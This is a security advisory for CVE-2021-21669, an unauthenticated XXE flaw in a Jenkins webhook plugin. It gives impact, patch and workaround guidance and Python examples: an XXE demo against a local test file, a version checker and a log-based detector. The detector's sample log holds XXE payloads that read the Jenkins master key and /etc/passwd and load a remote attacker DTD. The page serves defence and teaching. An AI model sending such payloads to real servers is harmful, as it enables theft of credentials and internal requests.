CVE-2021-21669

9.8 CRITICAL
XXE

📋 TL;DR

Generic Webhook Trigger Plugin 1.72 and earlier does not configure its XML parser to prevent XML External Entity (XXE) processing. Any request whose body the plugin's webhook endpoint (JENKINS_URL/generic-webhook-trigger/invoke) parses as XML can therefore declare external entities, which lets an unauthenticated attacker read files from the Jenkins controller (in particular secrets under $JENKINS_HOME) or make the controller issue requests to internal hosts (server-side request forgery). The endpoint is reachable without a Jenkins login by design, since it exists to be called by SCM hosts and other external systems, so exposure depends only on whether a vulnerable plugin release is installed.
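The mechanics behind the advisory, as an added example that is not code from the Jenkins plugin or the Jenkins project: Python's standard-library SAX parser is run over one in-band XXE payload under three configurations that correspond to a Java parser with external entities resolved (the unfixed plugin), external entities ignored, and DOCTYPE declarations rejected outright (the usual hardening). The "secret" file is constructed here and stands in for something like $JENKINS_HOME/secrets/master.key on a real controller.

```python
"""Added example (not code from the Jenkins plugin or project): XXE against
Python's stdlib SAX parser under vulnerable and hardened configurations.
The secret file is constructed; it stands in for a controller secret."""
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


class DoctypeRejected(Exception):
    """Raised by the hardened configuration when a document carries a DTD."""


class _TextCollector(ContentHandler):
    """Gathers character data, which is where in-band XXE output lands."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


class _NoDoctype:
    """Lexical handler whose only job is to abort on <!DOCTYPE ...>."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not accepted")

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def parse_text(xml_bytes, resolve_external, reject_doctype):
    """Parse XML and return its concatenated character data.

    resolve_external=True fetches SYSTEM entities (the vulnerable setting);
    reject_doctype=True refuses any DTD, which also stops internal-subset
    entity tricks and is the right setting for untrusted input."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    if reject_doctype:
        parser.setProperty(property_lexical_handler, _NoDoctype())
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.feed(xml_bytes)
    parser.close()
    return "".join(collector.chunks)


def xxe_payload(target_uri):
    """Classic in-band XXE: the entity's replacement text is echoed as element text."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "{target_uri}">]>\n'
        '<r>&xxe;</r>'
    ).encode()


def demo():
    """Run one payload through the three configurations and report what leaks."""
    with tempfile.NamedTemporaryFile("wb", suffix=".key", delete=False) as f:
        f.write(b"constructed-master-key-0123456789")  # constructed stand-in secret
        secret_path = Path(f.name)
    payload = xxe_payload(secret_path.as_uri())
    try:
        leaked = parse_text(payload, resolve_external=True, reject_doctype=False)
        silent = parse_text(payload, resolve_external=False, reject_doctype=False)
        try:
            parse_text(payload, resolve_external=False, reject_doctype=True)
            rejected = False
        except DoctypeRejected:
            rejected = True
    finally:
        secret_path.unlink()
    return {"leaked": leaked, "external_disabled": silent, "doctype_rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

With external entities resolved, the file's contents come back as the text of the r element; with them ignored, the entity expands to nothing; with DOCTYPE rejected, the document never reaches the entity at all. Rejecting DTDs is preferable to merely ignoring external entities because it also removes entity-expansion denial of service and parameter-entity tricks.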

💻 Affected Systems

Products:
  • Jenkins Generic Webhook Trigger Plugin
Versions: 1.72 and earlier
Operating Systems: All platforms running Jenkins
Default Config Vulnerable: ⚠️ Yes
Notes: Affects any Jenkins controller with a vulnerable release of the plugin installed. There is no job or global setting that opts into XML: the plugin chooses JSON or XML parsing based on the request's Content-Type header, so the sender, not the Jenkins administrator, decides whether the XML parser is used.

📦 What is this software?

Generic Webhook Trigger is a Jenkins plugin that lets jobs be started by an HTTP POST to the controller. It exposes a single endpoint, /generic-webhook-trigger/invoke, selects jobs by a per-job token, and extracts values from the request body (JSON via JSONPath or XML via XPath), from headers and from query parameters into build variables. Because it is designed to be called by external systems such as GitHub, GitLab or Bitbucket, the endpoint does not require a Jenkins login.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Extraction of controller secrets (the keys under $JENKINS_HOME/secrets such as master.key, encrypted credentials in credentials.xml together with the key needed to decrypt them, and configuration files) which in turn can give full control of Jenkins and the systems it holds credentials for; server-side request forgery from the controller against internal services that trust it. XXE in a Java parser does not by itself execute code, so any code execution comes from using the stolen material afterwards.

🟠

Likely Case

Reading text files that the Jenkins process user can access on the controller: job and credential configuration, secrets under $JENKINS_HOME, and source code checked out on the controller. In-band XXE only returns content that is well formed as XML entity text; out-of-band variants (a parameter entity that loads an attacker-hosted DTD) remove that restriction at the cost of needing egress from the controller.

🟢

If Mitigated

Patched controllers are unaffected. Allow-listing the webhook endpoint at the network edge confines the issue to the senders that can reach it. File-system permissions do not help: the parser runs as the Jenkins process user, which must be able to read the controller's own secrets.

🌐 Internet-Facing: HIGH - Webhook endpoints are typically exposed to external systems and can be triggered by unauthenticated requests.
🏢 Internal Only: MEDIUM - Anyone who can reach the controller over the network can send a webhook; no Jenkins account is needed.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation is an HTTP POST to the webhook endpoint with an XML Content-Type and a body that declares an external entity. No Jenkins authentication is involved: requests are matched to jobs by the token configured on the job, which is a shared value handed to the webhook sender rather than a user credential. XXE payloads for this pattern are generic and widely documented, and the vulnerability is described in the vendor advisory.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.73 and later

Vendor Advisory: https://www.jenkins.io/security/advisory/2021-06-18/#SECURITY-2330

Restart Required: Yes

Instructions:

1. Update the Generic Webhook Trigger Plugin to version 1.73 or later via the Jenkins Plugin Manager (Manage Jenkins > Manage Plugins > Updates).
2. Restart Jenkins; the updated plugin is not active until the controller restarts.
3. After the restart, verify the plugin version in the Installed tab of the plugin manager.

🔧 Temporary Workarounds

Restrict who can reach the webhook endpoint

Applies to: all platforms

Allow-list the sources that legitimately send webhooks (your SCM hosting provider's published IP ranges, internal CI integrations) for POST /generic-webhook-trigger/invoke at the firewall or the reverse proxy in front of Jenkins, and deny everyone else.

Do this at the network or proxy layer, not in the Jenkins authorization matrix: the plugin serves its endpoint as an unprotected root action by design, so matrix permissions do not gate it.

Block XML at the edge

Applies to: all platforms

If your webhook senders only post JSON, have the reverse proxy or WAF reject requests to /generic-webhook-trigger/invoke that carry an XML Content-Type (application/xml, text/xml) or whose body contains "<!DOCTYPE". The plugin itself has no setting that limits which payload formats it parses, so this cannot be configured inside Jenkins.

🧯 If You Can't Patch

  • Disable or uninstall the Generic Webhook Trigger Plugin (Manage Jenkins > Manage Plugins > Installed; a restart is required before the endpoint stops being served) and trigger builds by another route in the meantime
  • Put the controller behind a reverse proxy that forwards the webhook endpoint only from allow-listed sources, and keep the controller itself off untrusted networks

🔍 How to Verify

Check if Vulnerable:

Check Jenkins plugin manager for Generic Webhook Trigger Plugin version. If version is 1.72 or earlier, the system is vulnerable.

Check Version:

Navigate to Jenkins > Manage Jenkins > Manage Plugins (labelled Plugins in recent Jenkins releases) > Installed tab, and search for 'Generic Webhook Trigger'. For checking many controllers, the same data is available from JENKINS_URL/pluginManager/api/json?depth=1, where each entry of the plugins array carries shortName (generic-webhook-trigger) and version.

Verify Fix Applied:

Verify that the plugin version shown in the Jenkins plugin management interface is 1.73 or later and that Jenkins has been restarted since the update.
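A check over the Plugin Manager JSON API, as an added example (not a Jenkins project tool): it parses the plugin list, compares the installed version against the fix release and can be run across a fleet. The sample responses are constructed to mirror the shape of JENKINS_URL/pluginManager/api/json?depth=1 (a plugins array whose entries carry shortName, version, enabled and active); the controller names are placeholders.

```python
"""Added example (not from the Jenkins project): decide from the Plugin
Manager JSON API whether a controller still runs a Generic Webhook Trigger
release below the fix. Fetch real input with, for example:
    curl -s -u USER:API_TOKEN "$JENKINS_URL/pluginManager/api/json?depth=1"
The sample documents below are constructed, not captured."""
import json
import re

PLUGIN_ID = "generic-webhook-trigger"
FIXED_IN = (1, 73)  # first release with the SECURITY-2330 fix


def parse_version(version):
    """Turn a plugin version string into a comparable tuple.

    "1.72" -> (1, 72); "1.72.1" -> (1, 72, 1); a qualifier such as
    "1.73-SNAPSHOT" keeps only the numeric dotted prefix."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", version)
    if not m:
        raise ValueError(f"unparseable plugin version: {version!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def assess(plugin_manager_json):
    """Return installed/vulnerable status for the Generic Webhook Trigger plugin."""
    plugins = json.loads(plugin_manager_json).get("plugins", [])
    entry = next((p for p in plugins if p.get("shortName") == PLUGIN_ID), None)
    if entry is None:
        return {"installed": False, "version": None, "vulnerable": False, "active": False}
    version = entry.get("version", "")
    return {
        "installed": True,
        "version": version,
        # anything below the fix release is affected, including e.g. a 1.72.x
        "vulnerable": parse_version(version) < FIXED_IN,
        # a disabled plugin is not loaded, so its endpoint is not served,
        # but it is back the moment someone re-enables it: still patch it
        "active": bool(entry.get("active", False)),
    }


def assess_fleet(responses):
    """responses: {controller_name: json_text}. Returns only controllers needing action."""
    results = {name: assess(doc) for name, doc in responses.items()}
    return {name: r for name, r in results.items() if r["vulnerable"]}


# Constructed sample responses shaped like /pluginManager/api/json?depth=1
def _sample(version, active=True):
    return json.dumps({"plugins": [
        {"shortName": "git", "version": "4.7.2", "enabled": True, "active": True},
        {"shortName": PLUGIN_ID, "version": version, "enabled": active, "active": active},
    ]})


SAMPLE_VULNERABLE = _sample("1.72")
SAMPLE_FIXED = _sample("1.73")
SAMPLE_ABSENT = json.dumps({"plugins": [
    {"shortName": "git", "version": "4.7.2", "enabled": True, "active": True}]})


if __name__ == "__main__":
    fleet = {"ci-old": SAMPLE_VULNERABLE, "ci-new": SAMPLE_FIXED, "ci-none": SAMPLE_ABSENT}
    for name, doc in fleet.items():
        print(name, assess(doc))
    print("needs action:", sorted(assess_fleet(fleet)))
```

The comparison is deliberately "below 1.73" rather than "equal to 1.72 or lower" so that any intermediate build number sorts on the vulnerable side; the API call needs an account with Overall/Administer to list plugins.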

📡 Detection & Monitoring

Log Indicators:

  • XML parse errors (org.xml.sax.SAXParseException or XPath evaluation errors) attributed to the Generic Webhook Trigger plugin in the Jenkins system log, which can indicate malformed or probing payloads
  • In the reverse proxy access log: POST requests to /generic-webhook-trigger/invoke from source addresses that are not your known webhook senders, or with an XML Content-Type when your integrations only send JSON
  • Jenkins does not log request bodies, so the XXE payload itself is only visible if a proxy or WAF in front of Jenkins records bodies

Network Indicators:

  • Request bodies to the webhook endpoint containing a DOCTYPE with an external entity declaration (<!ENTITY name SYSTEM "file:///..." or "http://...")
  • Outbound connections from the controller to unexpected external hosts, or to internal services, shortly after a webhook request (out-of-band XXE or SSRF)

SIEM Query (reverse proxy access logs, Splunk-style; field names depend on your log source):

uri_path="/generic-webhook-trigger/invoke" method=POST NOT src_ip IN ("<allow-listed webhook senders>") | stats count by src_ip, content_type

Searching the Jenkins log itself for strings such as "DOCTYPE" or "SYSTEM" is not useful, since request bodies are never written there.
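Detection logic for the body-level indicators above, as an added example that is not tooling from this page or the Jenkins project: it scans request bodies for a DOCTYPE with external or parameter entity declarations and alerts only on POSTs to the webhook endpoint. Because Jenkins does not log bodies, the input is a constructed JSON-lines log of the kind a reverse proxy or WAF that records bodies can emit; the field names (ts, src, method, path, content_type, body) and the addresses are assumptions for the sample, not a standard format.

```python
"""Added example (not tooling from the page or the Jenkins project): flag
XXE-shaped requests aimed at the Generic Webhook Trigger endpoint in a
constructed JSON-lines proxy log that includes request bodies."""
import json
import re

ENDPOINT = "/generic-webhook-trigger/invoke"
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
# Matches  <!ENTITY [%] name SYSTEM "uri">  and  <!ENTITY [%] name PUBLIC "pubid" "uri">
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+
        (?:SYSTEM\s+(?P<sq>["'])(?P<sys_uri>.*?)(?P=sq)
          |PUBLIC\s+(?P<pq>["'])[^"']*(?P=pq)\s+(?P<uq>["'])(?P<pub_uri>.*?)(?P=uq))""",
    re.I | re.S | re.X,
)


def classify_uri(uri):
    """Rough intent of an external entity target, judged by URI scheme."""
    scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
    if scheme in ("file", "jar", "netdoc"):
        return "file-read"
    if scheme in ("http", "https", "ftp", "gopher"):
        return "ssrf-or-oob"
    if scheme == "":
        return "relative-path"  # resolved against the parser's base; still a file read
    return "other"


def analyze_body(body):
    """Return XXE indicators found in one request body (empty list if none)."""
    if not DOCTYPE_RE.search(body):
        return []
    findings = []
    for m in ENTITY_RE.finditer(body):
        uri = m.group("sys_uri") if m.group("sys_uri") is not None else m.group("pub_uri")
        findings.append({
            "entity": m.group("name"),
            # %name; entities live at DTD level and are typical of out-of-band XXE
            "parameter_entity": m.group("param") is not None,
            "uri": uri,
            "kind": classify_uri(uri),
        })
    if not findings:
        # A DTD with no external entities is odd for a webhook and still worth a look
        findings.append({"entity": None, "parameter_entity": False, "uri": None,
                         "kind": "doctype-only"})
    return findings


def scan_log(lines):
    """Scan JSON-lines records; alert on POSTs to the webhook endpoint with XXE indicators."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("method") != "POST" or not rec.get("path", "").startswith(ENDPOINT):
            continue
        indicators = analyze_body(rec.get("body", ""))
        if not indicators:
            continue
        severity = "high" if any(i["kind"] != "doctype-only" for i in indicators) else "low"
        alerts.append({"ts": rec.get("ts"), "src": rec.get("src"),
                       "severity": severity, "indicators": indicators})
    return alerts


# Constructed sample log: 192.0.2.5 plays the legitimate SCM webhook sender,
# 203.0.113.10 the attacker (both documentation address ranges).
def _rec(ts, src, method, path, ctype, body):
    return json.dumps({"ts": ts, "src": src, "method": method, "path": path,
                       "content_type": ctype, "body": body})


SAMPLE_LOG = "\n".join([
    _rec("2021-06-21T09:00:01Z", "192.0.2.5", "POST", ENDPOINT + "?token=build-main",
         "application/json", '{"ref":"refs/heads/main"}'),
    _rec("2021-06-21T09:00:02Z", "192.0.2.5", "POST", ENDPOINT,
         "application/xml", '<?xml version="1.0"?><push><ref>main</ref></push>'),
    _rec("2021-06-21T09:00:03Z", "203.0.113.10", "GET", ENDPOINT, "", ""),
    _rec("2021-06-21T09:00:04Z", "203.0.113.10", "POST", ENDPOINT, "application/xml",
         '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM '
         '"file:///var/lib/jenkins/secrets/master.key">]><r>&xxe;</r>'),
    _rec("2021-06-21T09:00:05Z", "203.0.113.10", "POST", ENDPOINT, "text/xml",
         '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtd SYSTEM '
         '"http://203.0.113.10/evil.dtd"> %dtd;]><r/>'),
    _rec("2021-06-21T09:00:06Z", "203.0.113.10", "POST", "/job/build-main/build",
         "application/xml", '<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>'),
])


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG.splitlines()):
        print(json.dumps(alert))
```

The two attacker records produce alerts (an in-band file read and an out-of-band parameter-entity load); the JSON webhook, the DOCTYPE-free XML, the GET and the DOCTYPE sent to a different path do not. Pair the body match with a source-address allow-list in production, since a legitimate sender posting a DTD-bearing document is rare but possible.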
